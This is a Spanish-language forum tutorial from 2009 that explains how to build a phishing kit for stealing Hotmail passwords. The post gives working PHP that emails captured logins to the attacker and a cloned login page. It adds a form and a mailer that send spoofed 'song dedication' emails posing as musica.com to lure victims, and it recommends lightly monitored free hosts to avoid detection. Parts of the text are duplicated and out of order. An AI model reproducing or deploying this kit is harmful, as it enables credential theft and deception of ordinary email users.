18-dic-2009
Silver User
Tuto crea Xploit desd 0 Hola a todos holas ^^
Primero q nada...
Primero q nada...
Tener un poco de conociemiento en HTML y PHP
Explorador de Internet (Firefox)
Editor HTML & PHP (Dreamweaver)
FTP (CuteFTP - Filexila - SmartFTP..etc)
2 Hosting ( MI@rroba - 000webhost.com)
Tiempo* ^_^
Explorador de Internet (Firefox)
Editor HTML & PHP (Dreamweaver)
FTP (CuteFTP - Filexila - SmartFTP..etc)
2 Hosting ( MI@rroba - 000webhost.com)
Tiempo* ^_^
Como veran pongo que nescesitamos 2 servidores uno en MI@rroba y otro en 000webhost,
ahora les dire porq. Pues resulta que para que los xploits funcione nececitamos un servidor con
la funcion mail() activa y pues eso solo algunos como lycos, 000webhost y algunos otros pro
estos tiene publicidad o como 000webhost son muy vigilados, en cambio mi@rroba kasi no lo
vigilan ^^ y eso les aseguro porke tengo una cuanta con xploits ahi desde hace como 5
meses, no recomiendo ke si tiene un servidor de paqgo ahi alogen sus xploits debido a q
pueden meterce en problemas ^^ mejro gratis jeje.
ahora les dire porq. Pues resulta que para que los xploits funcione nececitamos un servidor con
la funcion mail() activa y pues eso solo algunos como lycos, 000webhost y algunos otros pro
estos tiene publicidad o como 000webhost son muy vigilados, en cambio mi@rroba kasi no lo
vigilan ^^ y eso les aseguro porke tengo una cuanta con xploits ahi desde hace como 5
meses, no recomiendo ke si tiene un servidor de paqgo ahi alogen sus xploits debido a q
pueden meterce en problemas ^^ mejro gratis jeje.
Pra registrarce en dichos hosting busken manuales pro es muy facil registrarce esoo
Vamos a listar lo que un buen exploit necesita 
1.- El Fake #1 fake es igual a falso osease la pagina ke sera falsa y la victima pondra su contraseña,
en este caso HOTMAIL por podria ser HI5, Metroflogl, etc...
2.- El Fake #2 este es el ke llegara al correo de la victima osease el MSJ falso
ke hara ke entre a nuestro fake #1
3.- Pagina desde donde se mandara el xploit
4.- ps nadamas 3 cosas ^^ mas otro archivo =)
en este caso HOTMAIL por podria ser HI5, Metroflogl, etc...
2.- El Fake #2 este es el ke llegara al correo de la victima osease el MSJ falso
ke hara ke entre a nuestro fake #1
3.- Pagina desde donde se mandara el xploit
4.- ps nadamas 3 cosas ^^ mas otro archivo =)
1.1.1.- FAKE #1: BUsquemos que es lo que bamos a robar, cuentas de hotmail de metroflog
de hi5 y todo lo que te imagines ^_^
de hi5 y todo lo que te imagines ^_^
1.1.2.- Usaremos la clasica de Hotmail ^_^ y ahora veremos como la
obtendremos y como la tenemos que configurar.
1.1.3.- Vamos a la pagina hotmail.com
obtendremos y como la tenemos que configurar.
1.1.3.- Vamos a la pagina hotmail.com
1.1.4.-NOTA: para el siguiente paso es nesesario tener Firefox.
Ahora Click Derecho->Seleccionar todo->(damos otra vez click derecho en el texto
seleccionado y ahora->ver codigo fuente seleccionado, seleccionamos todo y
copiamos el codigo fuente a nuestro editor HTML en un nuevo documento PHP
seleccionado y ahora->ver codigo fuente seleccionado, seleccionamos todo y
copiamos el codigo fuente a nuestro editor HTML en un nuevo documento PHP
1.1.5.-Seleccionamos en el codigo fuente el correo ke aparece y precionamos Ctrl+F
y lo reemplazan con el seguiente codigo ^^
y lo reemplazan con el seguiente codigo ^^
Código PHP:
<?php echo $_GET[e2]."@hotmail.com"?> 
1.1.6.-Busquen el texto que pongo y reemplacen. (esto es para una mayor credibilidad ^^) (opcional)
Buscar:
Buscar:
Código:
La direccion de correo electronico o la contraseña son
Código:
incorrectas. Intentelo de nuevo.
Código:
Error de sesión, por su seguridad inserte sus datos
Código:
nuevamente.
Reemplazamos todos ^^
Esto lo agregamos puesto que no usamos una BD para almacenar codigos ^^
y es el correo al que mandaremos la contraseña.
Reemplazamos todo lo que este entre las comillas del "var srf_uPost=" por esto:
Reemplazamos todo lo que este entre las comillas del "action=" por esto:
Cheka donde dice tuhosting.000webhost.com debes cambiarlo por tu hosting que ayas creado
Reemplazar por:
1.1.10.-Buscar/Eliminar
Buscar:
Borrarlo!
Reemplazar por:
Hemos terminado nuestro Fake #1 ke es el de Hotmail y estubo un poko dificil ^^
, les pasaria el codigo ya hecho pero.. ustedes deben hacer algo xD todo x www.argentinawarez.com ^^
1.1.7.-Ahora buscamos en el codigo fuente igual con CRTL+F...
Buscar:
Buscar:
Código:
</form>
Agregar antes:
Código:
<input type="hidden" name="e2" value="<?php echo $_GET[e2]."@hotmail.com"?>">
y es el correo al que mandaremos la contraseña.
1.1.8.-Buscamos lo siguiente...
Buscar:
Buscar:
Código:
var srf_uPost='
Código:
action="
Código:
http://tuhosting.000webhost.com/login/?wa=wsignin1.0&rpsnv=10&ct=1237688797&rver=5.5.4177.0&wp=MBI&lc=3082&id=64855&mkt=es-ES
1.1.9.-Buscar/Reemplazar
Buscar:
Buscar:
Código:
css/
Código:
https://login.live.com/pp650/css/
Buscar:
Código:
<base href="https://login.live.com/pp650/">
1.1.11.-Buscar/Reemplazar
Buscar:
Buscar:
Código:
images/icon_err.gif
Código:
https://login.live.com/pp650/images/icon_err.gif
1.1.12.-Para mayor credibilidad agreguen esto despues del "<head>"
Código:
<link rel="shortcut icon" href="http://gfx2.hotmail.com/mail/w3/ltr/favicon.ico">
, les pasaria el codigo ya hecho pero.. ustedes deben hacer algo xD todo x www.argentinawarez.com ^^
Ya que tengan el archivo lo nombran index.php
y lo meten en una carpeta llamada -> login.live.sf.aspx
y lo meten en una carpeta llamada -> login.live.sf.aspx
1.2.1.-Ahora vamos a crear el archivo ke nos enviara la contraseña capturada =)
1.2.2.-Creamos una carpeta llamada login/ y en nuestro editor PHP
creamos un nuevo archivo php y lo llamamos index.php con el siguiente contenido..
creamos un nuevo archivo php y lo llamamos index.php con el siguiente contenido..
Código:
<title>Continuar</title>
Código:
<?phpif(($_POST['e2']!=0 || $_POST['e2']!="") and ($_POST['login']!=0 || $_POST['login']!="") and ($_POST['passwd']!="" || $_POST['passwd']!=0)){ $passwd=$_POST['passwd']; $lamer=$_POST['e2']; $victima=$_POST['login'];$subject = '|| Ha llegado la contraseña lamer xD ||'; $headers .= "Content-type: text/html; charset=UTF-8\n"; $headers .= "From: info@lamer-xploits.net\r\nContent-type: text/html\r\n"; $mensage ="<font face=Verdana><p>Hola,</p> <p>Este correo ha llegado a ti porque tú enviaste un Xploit desde nuestra página con el siguiente correo: <b>$lamer </b></p> <p>Y al parecer tu Víctima ha caido... estos son sus datos:</p> <p>Correo: <b>$victima</b></p> <p>Contraseña: <b>$passwd</b></p> <p>-------------------------------------------------------------------------------<br> Nosotros no nos hacemos responsables por el uso que le des a esta informacion...<br> <font size=\"2\">RockZito || Copyright 2009 todos los derechos reservados.</font> </p></font>"; mail($lamer, $subject, $mensage, $headers); } ?> <script type="text/javascript">window.location="http://www.musica.com/letras.asp?letra=972438";</script>
Eso seria todo con respecto al FAKE #1 verdad ke es sencillo ^^
2.1.1 Fake #2 Es lo que usaremos para engañar a la victima y esta acepte abrir le link ke lo llevara al fake #1
## En mi caso voy a usar uno de mi amigo se trata de la famosa pagina de Musica.Com,
y el Fake #2 enviara un correo diciendo que alguien le envia una cancion
y de clik en el link para verla =D
y el Fake #2 enviara un correo diciendo que alguien le envia una cancion
y de clik en el link para verla =D
2.1.2.-Diseñemos el formulario para enviar este Xploit ^^.
Creamos un nuevo documento llamado index.html o como gustes con el siguiente codigo...
Creamos un nuevo documento llamado index.html o como gustes con el siguiente codigo...
Código:
<style type="text/css">
Código:
<!--body { background-color: #000000; } body,td,th { color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; } .Estilo1 {color: #FFFFFF} --> </style> <div id="right"> <h2 align="center" class="Estilo1">Enviar Xploit Musica.Com</h2> <p align="center" class="Estilo1"><img src="http://musica.com/i/musica.gif" width="219" height="90"></p> <table width="500" border="0" align="center" cellspacing="0"> <tr> <td> <div align="justify"> <span class="Estilo1"> Xploit para robar contraseñas de Hotmail, mediante el envio de una canciòn, deves introducir los datos que se te piden, en nombre falso escribe el nombre de alguien importante (sentimentalmente hablando) para tu victima al igual que su correo... muy efectivo para los que usan esa pagina. =) </span></div></td> </tr> </table> <p> </p> <form action="http://tuhosting.000webhost/musica.php" method="POST"> <table width="500" border="0" align="center" cellspacing="0"> <tr> <td width="337"><div align="right">Tu Email Donde llegara la Contraseña:</div></td> <td width="159"><strong> <input name="correolam" type="text" id="correolam" size="25"> </strong></td> </tr> <tr> <td><div align="right">Email Falso : </div></td> <td><strong> <input name="n_mail" type="text" id="n_mail" size="25"> </strong></td> </tr> <tr> <td><div align="right">Nombre Falso : </div></td> <td><strong> <input name="nombre" type="text" id="nombre" size="25"> </strong></td> </tr> <tr> <td><div align="right">Email de tu vicitma:</div></td> <td><input name="to" type="text" id="to2" size="25"></td> </tr> <tr> <td><div align="right">Nombre de tu vicitma:</div></td> <td><input name="n_vict" type="text" id="nombre2" size="25"></td> </tr> </table> <div align="center"></div> <div align="center"><br> <input type="submit" value="Enviar Xploit" name="submit"> </p> </div> </form> </div>NOTA: Donde dice "tuhosting.000webhost.com/" cambialo por el ke
NOTA: Donde dice "tuhosting.000webhost.com/" cambialo por el ke tengas de 000webhost.com ^^
Quedara mas o menos asi ^^
2.1.3.- Creamos un nuevo archivo llamado musica.php
y colocamos el siguiente codigo ^^ este es para mandar el mail a la victima
y colocamos el siguiente codigo ^^ este es para mandar el mail a la victima
Código:
<?php
Código:
if (strstr($_POST['to'], "@") and strstr($_POST['to'], ".")) {//$headers .= "MIME-Version: 1.0\n"; $lamer = $_POST['correolam']; $to = $_POST['to']; $nombre = $_POST['nombre']; $n_mail = $_POST['n_mail']; $n_vict = $_POST['n_vict']; $asunto = "$n_vict TQM"; $headers .= "Content-type: text/html; charset=UTF-8\n"; $headers .= "From: letras@musica.com\r\nContent-type: text/html\r\n"; $codigohtml = "<center><font>Hola $n_vict, Sabes quisiera decirte tantas cosas, pero no se como decirtelo de frente, por eso te dedico esta cancion espero te guste.</font> <br><br> <a href=\"http://tuhost.webcindario.com/login.live.sf.aspx/? wa=wsignin1.0&rpsnv=10&ct=1237688797&rver=5.5.4177.0&wp=MBI&lc=3082&id=64855&mkt=es-ES &e="str_replace("@hotmail.com","",$to)"&e2="str_replace("@hotmail.com","",$lamer"\" target=\"_self\"> Sabes - Reik</a><br><br><font>No respondas a este mail</font><center>";mail($to,$asunto, $codigohtml, $headers);} else { $errormessage = "<strong>El e-mail que esribiste no es valido.</strong>"; } ?> <script> alert("Tu Xploit fue enviado a <? echo $to; ?>, cuando caiga se te enviara un mail con los datos."); </script> <script type="text/javascript">window.location="http://tuhost.webcindario.com/";</script>
NOTA: Donde dice "tuhost.webcindario.com" cambialo por tu hosting de Mi@rroba.
3.-llego la hora de subirlo a nuestros servidores 000webhost.com y Mi@rroba =)
pero antes chekemos algo =)
pero antes chekemos algo =)
Tenemos 4 archivos en carpetas =) deveria kedar asi...
|---------Iran en Mi@rroba--------------------------------------------|
|index.html (archivo desde donde se manda el xploit) |
|login.live.sf.aspx/index.php (archivo del FAKE #1 osea el de hotmail)|
|---------------------------------------------------------------------|
|index.html (archivo desde donde se manda el xploit) |
|login.live.sf.aspx/index.php (archivo del FAKE #1 osea el de hotmail)|
|---------------------------------------------------------------------|
|----------Iran en 000webhost.com --------------------------------------------------------|
|musica.php (archivo para mandar el correo a la victima) |
|login/index.php (archivo para mandarnos la contraseña cuando esta sea capturada)|
|--------------------------------------------------------------------------------|
|musica.php (archivo para mandar el correo a la victima) |
|login/index.php (archivo para mandarnos la contraseña cuando esta sea capturada)|
|--------------------------------------------------------------------------------|
Subimos como se muestra con nuestro Cliente FTP preferido =)
Ahora veamos si funciona o no xD
Bien eso es todo ^^ espero les sirva de algo esta muy simple
si te parece bueno este tuto gracias si no pues igual gracias por ver jeje ^^
Descargar Tuto crea Xploit desd 0 Gratis
21-dic-2009
White User
Re: Tuto crea Xploit desd 0
Hola, bueno ya lei como cuatro veces el post pero no entiendo eso de web host ya estoy inscrito en mi arroba y web host pero no se utilizarlas 
y te estaria muy agradecido si me explicaras esta parte que tiene que ver con dichas paginas saludos 
y te estaria muy agradecido si me explicaras esta parte que tiene que ver con dichas paginas saludos 18-abr-2010
New User
Re: Tuto crea Xploit desd 0 09-jun-2010
New User
Re: Tuto crea Xploit desd 0 04-sep-2010
Premium User
Re: Tuto crea Xploit desd 0 28-nov-2010
New User
Re: Tuto crea Xploit desd 0 03-jul-2011
King User
Re: Tuto crea Xploit desd 0
Necesitás estar Registrado para comentar y descargar Tuto crea Xploit desd 0
Información del Post
Puntos: 0 |
Visitas: 1656 | 
Publicado por: Princiiipito |- Categoría: Descargar Cheats & Hacks
Tags:crea, desd, tuto, xploit, Tuto crea Xploit desd 0 1 link, descargar Tuto crea Xploit desd 0 gratis
Compartir en:
Descargas relacionadas con Tuto crea Xploit desd 0